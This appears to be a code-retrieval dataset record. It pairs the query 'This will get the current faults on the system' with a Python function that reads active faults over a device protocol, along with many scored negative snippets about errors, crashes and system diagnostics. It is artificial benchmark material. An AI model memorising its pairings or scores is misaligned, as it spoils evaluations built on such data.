"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def page_fault(self):\n self._page_fault += 1",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def remote_getStatus(self):\n zep = getFacade('zep')\n issues = zep.getDeviceIssues(eventClass=[Status_Mail],\n severity=[SEVERITY_WARNING, SEVERITY_ERROR, SEVERITY_CRITICAL])\n return [d\n for d, count, total in issues\n if getattr(self.config.devices, d, None)]",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def errors_fatal(self) -> List[Error]:",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def exechost_status():\n\n exechost = socket.gethostname()\n\n # free\n try:\n subp = subprocess.Popen([\"free\", \"-m\"], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s FREE\\n%s\" % (exechost, output)\n except:\n print \"Problem running free command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"\n\n # df\n try:\n cwd = os.getcwd()\n subp = subprocess.Popen([\"df\", \"-h\", cwd], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s DF\\n%s\" % (exechost, output)\n except:\n print \"Problem running df command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")",
"def fault_summary(request, accountId):\n if not accountId or len(accountId) == 0:\n return JSONResponse('No input parameter account_id.', status=400)\n\n token = query.getZabbixToken()\n print token\n if not token:\n LOG.exception('failed to query zabbix for token.')\n return JSONResponse('Failed to query zabbix for token.', status=500)\n\n data = query.getServiceState(accountId, token)\n print data\n if data == None:\n LOG.exception('failed to query zabbix for service state.')\n return JSONResponse('Failed to query zabbix for service state.', status=500)\n\n serviceData = normalizeServiceState(data)\n print serviceData\n result = {'service_state': {\n 'account_id': accountId,\n 'account_name': serviceData[0],\n 'hosts': serviceData[1]\n }}\n return JSONResponse(result)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def getExceptions(self):\n return self.getOrDefault(\"exceptions\")",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def termination_status(self):\n res = {}\n for i in range(len(self)):\n res[i] = self.kernels[i].stop()\n return res",
"def exc_info(self):\n return self._exc_info",
"def geterr():\n return __errprof.state.copy()",
"def check_errors(self) -> None:\n # TODO check the manual for error codes & interpert them.\n return self.send(self.cmd.GET_GLOBALSTATUS_CURRENTERROR)",
"def clear_faults(self, session, params):\n\n session.set_status('running')\n yield self.acu_control.clear_faults()\n session.set_status('stopping')\n return True, 'Job completed.'",
"def get_number_of_crashes(result_info):\n assert isinstance(result_info, dict)\n # FIXME: We can't use analyse.get_generic_run_outcomes()\n # because we can't distinguish between a crash and an out\n # of memory situation properly\n #reports = analyse.get_generic_run_outcomes(result_info)\n is_merged_result = analyse.raw_result_info_is_merged(result_info)\n non_zero_exit_code_count = 0 # Only counted if it wasn't an out of memory run\n out_of_memory_count = 0\n if is_merged_result:\n assert isinstance(result_info['out_of_memory'], list)\n assert isinstance(result_info['exit_code'], list)\n assert len(result_info['out_of_memory']) == len(result_info['exit_code'])\n for index, oom in enumerate(result_info['out_of_memory']):\n corresponding_exit_code = result_info['exit_code'][index]\n if oom is True:\n out_of_memory_count += 1\n elif corresponding_exit_code is not None and corresponding_exit_code != 0:\n non_zero_exit_code_count += 1\n else:\n if result_info['out_of_memory'] is True:\n out_of_memory_count += 1\n elif result_info['exit_code'] is not None and result_info['exit_code'] != 0:\n non_zero_exit_code_count += 1\n return non_zero_exit_code_count + out_of_memory_count",
"def get_fault_info(filenames=['disk_sample_fault_tag.csv', 'disk_sample_fault_tag_201808.csv']):\n fault_df1 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[0]))\n fault_df2 = pd.read_csv(os.path.join(conf.DATA_DIR, filenames[1]))\n fault_df2.drop(['key'], axis=1,inplace=True)\n fault_tag_df = pd.concat([fault_df1, fault_df2], ignore_index=True)\n fault_dic = {}\n \n for _, row in fault_tag_df.iterrows():\n f_time = row[\"fault_time\"]\n tag = row[\"tag\"]\n key = tuple([row[\"manufacturer\"], row[\"model\"], row[\"serial_number\"]])\n if key not in fault_dic.keys():\n sub_dic = {}\n sub_dic[\"date\"] = f_time\n sub_dic[\"tag\"] = tag\n fault_dic[key] = sub_dic\n return fault_dic",
"def GetLongLineExceptions(self):\n return []",
"def diagnostic_trouble_codes(self):\n return self._diagnostic_trouble_codes",
"def get_exception_trap():\n return CRDS_EXCEPTION_TRAP",
"def get_crashing_anomaly_ids(self):\n\n crashing_anomalies = []\n\n for anomaly_id in self.get_anomaly_ids():\n if self.get_anomaly_error(anomaly_id) is not None:\n crashing_anomalies.append(anomaly_id)\n\n return crashing_anomalies",
"def GetFailures(self):\n return self._compute_client.all_failures",
"def server_fault(e):\n return \"Something went wrong, and it is our fault. Try reloading the page.\"",
"def dependencies(self):\n return self._dependency_analyzer.GetDependencies(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def trace(context=1):\r\n return getinnerframes(sys.exc_info()[2], context)",
"def Errcheck(self) -> list:\n\n myError = []\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n if int(Error) == 0:\n\n print (\"+0, No Error!\")\n\n else:\n\n while int(Error)!=0:\n\n print (\"Error #: \" + ErrorList[0])\n\n print (\"Error Description: \" + ErrorList[1])\n\n myError.append(ErrorList[0])\n\n myError.append(ErrorList[1])\n\n ErrorList = self.myFieldFox.query(\"SYST:ERR?\").split(',')\n\n Error = ErrorList[0]\n\n myError = list(myError)\n\n return myError",
"def get_fatal_alerts(self, path):",
"def get_resources():\n # Acquire the lock...\n get_resources_lock.acquire()\n\n # ...but always release it\n try:\n # Construct the dictionaries as copies from nanny\n (limits,usage) = nanny.get_resource_information()\n\n\n # Calculate all the usage's\n pid = os.getpid()\n\n # Get CPU and memory, this is thread specific\n if ostype in [\"Linux\", \"Darwin\"]:\n \n # Get CPU first, then memory\n usage[\"cpu\"] = os_api.get_process_cpu_time(pid)\n\n # This uses the cached PID data from the CPU check\n usage[\"memory\"] = os_api.get_process_rss()\n\n # Get the thread specific CPU usage\n usage[\"threadcpu\"] = os_api.get_current_thread_cpu_time() \n\n\n # Windows Specific versions\n elif ostype in [\"Windows\"]:\n \n # Get the CPU time\n usage[\"cpu\"] = windows_api.get_process_cpu_time(pid)\n\n # Get the memory, use the resident set size\n usage[\"memory\"] = windows_api.process_memory_info(pid)['WorkingSetSize'] \n\n # Get thread-level CPU \n usage[\"threadcpu\"] = windows_api.get_current_thread_cpu_time()\n\n # Unknown OS\n else:\n raise EnvironmentError(\"Unsupported Platform!\")\n\n # Use the cached disk used amount\n usage[\"diskused\"] = cached_disk_used\n\n finally:\n # Release the lock\n get_resources_lock.release()\n\n # Copy the stop times\n stoptimes = process_stopped_timeline[:]\n\n # Return the dictionaries and the stoptimes\n return (limits,usage,stoptimes)",
"def emergency_recover_states_from_failure():\n _emergency_state_check()\n _emergency_iobuf_extract()",
"def exc_info(self):\n ei = self._exc_info\n if ei is not None and ei[0] is not None:\n return (\n ei[0],\n ei[1],\n # The pickled traceback may be None if we couldn't pickle it.\n load_traceback(ei[2]) if ei[2] else None\n )",
"def exception_stacktrace(self):\n # type: () -> list[string_types]\n return self._exception_stacktrace",
"def get_crash_events_data(self, tc_name):\n raise DeviceException(DeviceException.FEATURE_NOT_IMPLEMENTED)",
"def issues(self) -> List[IssueType]:\n return [IssueType.FREE_SPACE]",
"def get_internal_errors(self) -> Dict[str, int]:\n self.serial.write(b\"D!\")\n values = self.__read_response(4)\n first_address_byte_errors = self.__extract_int(values[0], b\"!E1\")\n command_byte_errors = self.__extract_int(values[1], b\"!E2\")\n second_address_byte_errors = self.__extract_int(values[2], b\"!E3\")\n PEC_byte_errors = self.__extract_int(values[3], b\"!E4\")\n\n return {\n \"first_address_byte_errors\": first_address_byte_errors,\n \"command_byte_errors\": command_byte_errors,\n \"second_address_byte_errors\": second_address_byte_errors,\n \"PEC_byte_errors\": PEC_byte_errors,\n }",
"def error(self) -> list:\n return self.__err",
"def getCurrentSystemFunds(self):\n e = self.myParent.myEmpireDict\n d = self.myParent.mySystemDict\n return [e['CR'], d['AL'],d['EC'],d['IA']]",
"def getTraceback(self):\n self.mostLikelyPath = zeros((1, self.T+2))\n\n self.mostLikelyPath[0,0] = 0\n self.mostLikelyPath[0,-1] = self.noOfEmmittingStates+1\n\n for s in range(self.T, 0, -1):\n self.mostLikelyPath[0,s] = self.traceback[self.mostLikelyPath[0,s+1]-1, s]",
"def getCrashDumps(self):\r\n\r\n if len(core.FW_conf['connection']._getCrashDumps()):\r\n return True\r\n else:\r\n return False",
"def get_fault_index(self, device_type_name, fault_name, channel_number):\n if device_type_name in [\"SOLN\", \"BEND\", \"PBLM\", \"CBLM\", \"LBLM\", \"BLEN\", \"BLM\", \"KICK\"]:\n # For SOLN devices type, the fault name is \"Ix\",\n # where x is the integration channel\n integration_channel = int(fault_name[-1])\n\n if integration_channel not in range(4):\n raise ValueError(\"Function \\\"__get_fault_index(device_type_name={}, fault_name={}, channel_number={})\\\".\\\n Integration channel = {} out of range [0:3]\".format(device_type_name, fault_name,\n channel_number, integration_channel))\n\n return \"{}{}\".format(channel_number, integration_channel)\n else:\n # For other application, the get index from the following 2-D dict\n bpm_fault_index = { \"X\":\"0\", \"Y\":\"1\", \"TMIT\":\"2\" }\n bcm_fault_index = { \"CHARGE\":\"0\", \"DIFF\": \"1\" }\n fault_indexes = { \"BPMS\":bpm_fault_index,\n \"FARC\":bcm_fault_index,\n \"TORO\":bcm_fault_index }\n return fault_indexes[device_type_name][fault_name]",
"def get_unbroken_instances(self):\n return self._get_cond_instance(cond=0)",
"def find_backtrace(self):\n return [ft for ft in os.listdir(self.output_dir)\n if os.path.isfile(ft) and ft.startswith(\"Backtrace.\")]",
"def getFatalErrors(self):\n global hadFatalErrors\n if hadFatalErrors:\n text = '\\n'.join(hadFatalErrors)\n hadFatalErrors = []\n return text",
"def problems(self):\n return self.configuration.problems",
"def refined_errors(self):\r\n errs = []\r\n for err in self.errors:\r\n if err['typo'].lower() not in self.terms:\r\n errs.append(err)\r\n return errs",
"def _get_failed_stack_events(stack_name: str, region: str, profile: str = None) -> list:\n logger.debug(f\"getting stack {stack_name} failure events in region {region}\")\n cfn_client = _get_cfn_client(region=region, profile=profile)\n try:\n events = cfn_client.describe_stack_events(StackName=stack_name)\n except Exception as e:\n logger.error(f\"unable to get stack events\")\n logger.error(e)\n raise e\n result = list()\n for event in events['StackEvents']:\n if \"FAILED\" in event['ResourceStatus']:\n result.append(event)\n if len(result) == 0:\n # There were no FAILED events. Look for ROLLBACK_IN_PROGRESS\n for event in events['StackEvents']:\n if \"ROLLBACK_IN_PROGRESS\" in event['ResourceStatus']:\n result.append(event)\n logger.debug(f\"failure events {result}\")\n return result",
"def retrieve_error_messages(self):\n return self.errors_seen[:]",
"def describe_service_errors(StackId=None, InstanceId=None, ServiceErrorIds=None):\n pass",
"def errors(self) -> List[Error]:",
"def _get_resends(self):\n if not self.has_error():\n return []\n\n errors = []\n i = 0\n for item in self.my_json['results']:\n if item.has_key('error') and item['error'] == 'Unavailable':\n errors.append((i, item['error']))\n i += 1\n return errors",
"def traces(self):\n if self._traces is None:\n raise NotImplementedError(\"Weak implementation not supported\")\n else:\n return self._traces",
"def get_errors(self):\n return [result for result in self.values() if result.outcome == Result.ERROR]",
"def checkExceptions(self):\n\n nwarn = 0\n\n icatExceptionType = self.client.factory.create('icatExceptionType')\n schemaexceptions = set(icatExceptionType.__keylist__)\n clientexceptions = set(icat.exception.IcatExceptionTypeMap.keys())\n missing = schemaexceptions - clientexceptions\n if missing:\n log.warning(\"missing exception types: %s\", list(missing))\n nwarn += 1\n\n return nwarn",
"def get_error(self) -> List[str]:\n return []",
"def get_error(self) -> List[str]:\n return []",
"def detect_fatal_errors(self):\n for instance in self.all_instances:\n instance.detect_fatal_errors()",
"def GetAll(self):\n return self._errors.copy()",
"def execute(session, files):\n return TopVehicleCrashes.__process(TopVehicleCrashes, session, files)",
"def _get_errors(exc):\n if hasattr(exc, 'message'):\n errors = exc.messages\n else:\n errors = [str(exc)]\n return errors",
"def means_missing(self):\n return self.fault_code in (32, 33)",
"def display_minutni_fault_info(self, fault):\r\n args = {'id':self.minutniId,\r\n 'statusString':fault}\r\n self.emit(QtCore.SIGNAL('get_minutni_fault_info(PyQt_PyObject)'), args)",
"def GetExpectedCrashes(self, args: ct.TestArgs) -> None:\n # args[0] is the PixelTestPage for the current test.\n return args[0].expected_per_process_crashes",
"def freak():\n with settings(hide('everything'), warn_only=True):\n result = []\n try:\n check = sudo('lsof | grep DEL | grep -e crypto -e libssl')\n if check.return_code == 1:\n result = 'OK'\n logging.warning(\"%s: %s\" % (env.host, result))\n else:\n services = check.split('\\r')\n for service in services:\n service_name = service.split()[0]\n result.append(service_name)\n result = list(set(result))\n print(\"%s: VULNERABLE: %s\" % (env.host, ' '.join(result)))\n logging.warning(\"%s: VULNERABLE: %s\" % (env.host,\n ' '.join(result)))\n except Exception as e:\n logging.warning('%s: Error: %s' % (env.host, e.message))",
"def errorbars (self):\n return self._errorbars",
"def get_fault_type_label(self, cavity_number):\n # Make sure we received a valid cavity number\n self.assert_valid_cavity_number(cavity_number)\n\n # Load fault type model and make a prediction on the current example's features\n fault_idx, fault_confidence = self.make_prediction(self.fault_onnx_session)\n\n # Get the fault name and probability associated with that index\n fault_names = [\"Quench_100ms\", \"Quench_3ms\", \"E_Quench\", \"Heat Riser Choke\", \"Microphonics\", \"Controls Fault\",\n \"Single Cav Turn off\"]\n fault_name = fault_names[fault_idx]\n\n return {'fault-label': fault_name, 'fault-confidence': fault_confidence}",
"def getFailedJobs(self):\n return self.__failedJobs",
"def getErrorsList(self):\n return self.__errors",
"def get_sysfds(self):\n return [self._ptr.contents.sysfds[i] for i in range(RUSS_CONN_NSYSFDS)]",
"def get_aborted_actions(self):\n return self.failed",
"def get_traceback(self, i):\n (_, (_, _, tb)) = self.get_exception()\n\n while i and tb.tb_next:\n tb = tb.tb_next\n i -= 1\n\n return tb",
"def get_spitfp_error_count(self):\n return GetSPITFPErrorCount(*self.ipcon.send_request(self, BrickletBarometerV2.FUNCTION_GET_SPITFP_ERROR_COUNT, (), '', 'I I I I'))",
"def dependency_rolls(self):\n return self._dependency_analyzer.GetDependencyRolls(\n [self.stacktrace.crash_stack] if self.stacktrace else [])",
"def all_errata(self):\n return self._all_errata",
"def getSyscallHooks(self):\n return None",
"def getErrorTableIndex(self, *args):\n return _libsbml.FbcExtension_getErrorTableIndex(self, *args)",
"def traceback(self):",
"def errors_fatal(self) -> List[Error]:\n return self._errors_fatal_files + self._errors_fatal"
] | [
"0.82058364",
"0.7297142",
"0.6973599",
"0.62839913",
"0.6117404",
"0.5914989",
"0.585911",
"0.5828832",
"0.56888837",
"0.5640751",
"0.5596669",
"0.55570495",
"0.5398989",
"0.5372518",
"0.5344608",
"0.5326614",
"0.52823734",
"0.525599",
"0.5215235",
"0.5206905",
"0.51792276",
"0.51715744",
"0.51645386",
"0.5153811",
"0.51442236",
"0.5125883",
"0.5123245",
"0.5093789",
"0.50876576",
"0.50817794",
"0.5032068",
"0.5025616",
"0.4981695",
"0.4981695",
"0.4980397",
"0.49771124",
"0.49738127",
"0.49723223",
"0.4921869",
"0.4915626",
"0.4901078",
"0.48889944",
"0.48836654",
"0.48517585",
"0.4849374",
"0.48324996",
"0.48176455",
"0.4802844",
"0.47814584",
"0.4777862",
"0.47610652",
"0.47609344",
"0.47511852",
"0.4740264",
"0.4733746",
"0.47331813",
"0.47296825",
"0.47276458",
"0.47261629",
"0.4720682",
"0.47180402",
"0.4714924",
"0.47041366",
"0.47032252",
"0.46961823",
"0.4691959",
"0.46909627",
"0.46824005",
"0.4668972",
"0.46686617",
"0.46554092",
"0.46504578",
"0.46438566",
"0.4634459",
"0.46245202",
"0.46169472",
"0.46156654",
"0.46156654",
"0.46139967",
"0.46054542",
"0.46039313",
"0.46025866",
"0.45971525",
"0.4595424",
"0.4589683",
"0.45861518",
"0.4584958",
"0.4583668",
"0.45823526",
"0.4578836",
"0.4576294",
"0.45666933",
"0.45558944",
"0.45450717",
"0.45297772",
"0.4518949",
"0.45095977",
"0.4505974",
"0.45040157",
"0.44922727"
] | 0.6233432 | 4 |
This will get the current faults on the system. | def get_faults_current(self):
request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_ACTIVE], BP_TOOL.REQUEST_16)
return self.__get_faults_list(self.config_16.faults_current) | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def faults(self):\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n faults = \" \"\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,bits = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n else:\n fault_names = {0:\"Tank Level Low\",2:\"Temperature above alarm range\",\n 4:\"RTD Fault\",5:\"Pump Fault\",7:\"Temperature below alarm range\"}\n faults = \"\"\n for i in range(0,8):\n if (bits >> i) & 1:\n if i in fault_names: faults += fault_names[i]+\", \"\n else: faults += str(i)+\", \"\n faults = faults.strip(\", \")\n if faults == \"\": faults = \"none\"\n debug(\"Faults %s\" % faults)\n return faults",
"def get_faults_latched(self):\n request = self.get_option_from_shouter([t_16_Bit_Options.FAULT_LATCHED], BP_TOOL.REQUEST_16)\n return self.__get_faults_list(self.config_16.faults_latched)",
"def fault_counters(self):\n done, data = self._request('GF')\n if done:\n return {\n 'GFI self test': int(data[0], 16),\n 'Ground': int(data[1], 16),\n 'Stuck relay': int(data[2], 16)\n }\n\n raise EvseError",
"def __get_faults_list(self, faults):\n r_faults = []\n for x in faults:\n if faults[x]['value']:\n r_faults.append(faults[x]['name'])\n return r_faults",
"def _extend_fault_map(self):\n faults.FAULT_MAP.update({nsx_lib_exc.ManagerError:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.ServiceClusterUnavailable:\n webob.exc.HTTPServiceUnavailable,\n nsx_lib_exc.ClientCertificateNotTrusted:\n webob.exc.HTTPBadRequest,\n nsx_exc.SecurityGroupMaximumCapacityReached:\n webob.exc.HTTPBadRequest,\n nsx_lib_exc.NsxLibInvalidInput:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxENSPortSecurity:\n webob.exc.HTTPBadRequest,\n nsx_exc.NsxPluginTemporaryError:\n webob.exc.HTTPServiceUnavailable\n })",
"def fault():\n return FaultCohesiveKin()",
"def get_faults_history(self, epg_dn):\n class_query = ClassQuery('faultRecord')\n class_query.propFilter = 'eq(faultRecord.affected, \"' + epg_dn + '\")'\n return self.moDir.query(class_query)",
"def _isfault(self):\n return self.dp.state()==PyTango.DevState.FAULT",
"def sys_exc_info(self, for_hidden=False):\n return self.gettopframe()._exc_info_unroll(self.space, for_hidden)",
"def fault(self):\n return (self.status == self.STATUS_FAULT)",
"def fault_code(self):\n from numpy import nan\n debug(\"Getting faults...\")\n code = int(\"01001000\",2)\n command = pack('B',code)\n reply = self.query(command,count=2)\n fault_code = nan\n # The reply is 0xC8 followed by a faults status byte.\n if len(reply) != 2:\n if len(reply)>0:\n warn(\"%r: expecting 2-byte reply, got %r\" % (command,reply))\n elif self.connected:\n warn(\"%r: expecting 2-byte reply, got no reply\" % command)\n else:\n reply_code,fault_code = unpack('<BB',reply)\n if reply_code != code:\n warn(\"reply %r: expecting 0x%X(%s), got 0x%X(%s)\" %\n (reply,code,bin(code),reply_code,bin(reply_code)))\n fault_code = nan\n if fault_code == 2.0**7:\n fault_code = 8\n elif fault_code == 2.0**6:\n fault_code = 7\n elif fault_code == 2.0**5:\n fault_code = 6\n elif fault_code == 2.0**4:\n fault_code = 5\n elif fault_code == 2.0**3:\n fault_code = 4\n elif fault_code == 2.0**2:\n fault_code = 3\n elif fault_code == 2.0**1:\n fault_code = 2\n elif fault_code == 2.0**0:\n fault_code = 1\n elif fault_code == 0:\n fault_code = 0\n else:\n fault_code = -1\n debug(\"Fault code %s\" % fault_code)\n return fault_code",
"def check_page_faults(con, host, warning, critical,perf_data):\n warning = warning or 10\n critical = critical or 30\n data=get_server_status(con)\n\n try:\n page_faults=float(data['extra_info']['page_faults']) \n except:\n # page_faults unsupported on the underlaying system\n return exit_with_general_critical(\"page_faults unsupported on the underlaying system\")\n \n err,delta=maintain_delta([page_faults],host,\"page_faults\")\n if err==0:\n page_faults_ps=delta[1]/delta[0]\n message = \"Page faults : %.2f ps\" % page_faults_ps\n message+=performance_data(perf_data,[(\"%.2f\" %page_faults_ps,\"page_faults_ps\",warning,critical)])\n return check_levels(page_faults_ps,warning,critical,message)\n else:\n return exit_with_general_warning(\"problem reading data from temp file\")",
"def read_fault(filename):\n\n fault_x = []\n fault_y = []\n fault_file = open(filename)\n\n for segment in fault_file:\n x, y = segment.split()\n fault_x.append(float(x))\n fault_y.append(float(y))\n\n fault_file.close()\n\n return fault_x, fault_y",
"def _GetAbortRequests(self):\n new_requests = self._GetRequestsByState(self._ABORTING)\n for request_id in new_requests:\n logging.info('Abort requested for %s', request_id)\n self._ClearRequest(request_id, self._ABORTING)\n return new_requests",
"def __get_fault(self, mps_db_session, fault_id):\n fault = mps_db_session.query(models.Fault).filter(models.Fault.id==fault_id).all()\n\n if len(fault) == 1:\n return fault[0]\n elif len(fault) == 0:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). Not fault was found.\\\"\"\n .format(fault_id))\n else:\n raise ValueError(\"Function \\\"__get_fault(fault_id={}). More than one fault matches\\\"\"\n .format(fault_id))",
"def as_fault(self):\n return Fault(self.fault_code, self.internal_message or\n 'unknown server error')",
"def page_fault(self):\n self._page_fault += 1",
"def pageFault(proc):\n\n global pfList\n pfList.append([proc, 1])",
"def get_diagnostics(self) -> List[Diagnostic]:\n raise NotImplementedError",
"def get_unexpected_reboots(self):\n\n _, remaining_bootups = self.get_unmatched_events(\n event_cause_label=\"basic.reboot_trigger\",\n event_effect_label=\"basic.bootup\")\n\n return remaining_bootups",
"def remote_getStatus(self):\n zep = getFacade('zep')\n issues = zep.getDeviceIssues(eventClass=[Status_Mail],\n severity=[SEVERITY_WARNING, SEVERITY_ERROR, SEVERITY_CRITICAL])\n return [d\n for d, count, total in issues\n if getattr(self.config.devices, d, None)]",
"def faulty(self, *args):\n for each in args:\n if not self.is_faulty(each):\n self._faults.add(each)",
"def panic_on_fault_enabled(self):\n # The panic_on_fault mechanism might not even be included in the build\n # (in which case the panic_on_fault variables won't exist), so be defensive.\n try:\n enabled = self.chipdata.get_var_strict(\n 'L_panic_on_fault_enabled'\n ).value\n fault_id = self.chipdata.get_var_strict(\n 'L_panic_on_fault_id'\n ).value\n except ct.DebugInfoNoVariable:\n enabled = False\n fault_id = 0\n return (enabled, fault_id)",
"def errors_fatal(self) -> List[Error]:",
"def cpu_halt_reasons(self):\n buf_size = self.MAX_NUM_MOES\n buf = (structs.JLinkMOEInfo * buf_size)()\n num_reasons = self._dll.JLINKARM_GetMOEs(buf, buf_size)\n if num_reasons < 0:\n raise errors.JLinkException(num_reasons)\n\n return list(buf)[:num_reasons]",
"def is_faulty(self, event):\n for each in self._faults:\n if each.name.upper() == event.name.upper():\n return True\n return False",
"def exechost_status():\n\n exechost = socket.gethostname()\n\n # free\n try:\n subp = subprocess.Popen([\"free\", \"-m\"], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s FREE\\n%s\" % (exechost, output)\n except:\n print \"Problem running free command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"\n\n # df\n try:\n cwd = os.getcwd()\n subp = subprocess.Popen([\"df\", \"-h\", cwd], stdout=subprocess.PIPE)\n output = subp.communicate()[0]\n print \"EXECSTAT %s DF\\n%s\" % (exechost, output)\n except:\n print \"Problem running df command\"\n (extype, exvalue, trback) = sys.exc_info()\n traceback.print_exception(extype, exvalue, trback, limit=1, file=sys.stdout)\n print \"Ignoring error and continuing...\\n\"",
"def threat_exceptions(self) -> pulumi.Output[Sequence[str]]:\n return pulumi.get(self, \"threat_exceptions\")",
"def fault_summary(request, accountId):\n if not accountId or len(accountId) == 0:\n return JSONResponse('No input parameter account_id.', status=400)\n\n token = query.getZabbixToken()\n print token\n if not token:\n LOG.exception('failed to query zabbix for token.')\n return JSONResponse('Failed to query zabbix for token.', status=500)\n\n data = query.getServiceState(accountId, token)\n print data\n if data == None:\n LOG.exception('failed to query zabbix for service state.')\n return JSONResponse('Failed to query zabbix for service state.', status=500)\n\n serviceData = normalizeServiceState(data)\n print serviceData\n result = {'service_state': {\n 'account_id': accountId,\n 'account_name': serviceData[0],\n 'hosts': serviceData[1]\n }}\n return JSONResponse(result)",
"def check_errors(self):\n\n errors = []\n while True:\n err = self.values(\"SYST:ERR?\")\n if int(err[0]) != 0:\n errmsg = \"Agilent 5313xA: {0}: {1}\".format(err[0], err[1])\n log.error(errmsg + '\\n')\n errors.append(errmsg)\n else:\n break\n\n return errors",
"def getExceptions(self):\n return self.getOrDefault(\"exceptions\")",
"def __exc_info(self):\n exctype, excvalue, tb = sys.exc_info()\n if sys.platform[:4] == 'java': ## tracebacks look different in Jython\n return (exctype, excvalue, tb)\n return (exctype, excvalue, tb)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def expand_faults():\n for (x, y) in SupvisorsFaults.__dict__.items():\n if not x.startswith('__'):\n setattr(Faults, x, y + FAULTS_OFFSET)",
"def termination_status(self):\n res = {}\n for i in range(len(self)):\n res[i] = self.kernels[i].stop()\n return res",
"def exc_info(self):\n return self._exc_info",
"def geterr():\n return __errprof.state.copy()",
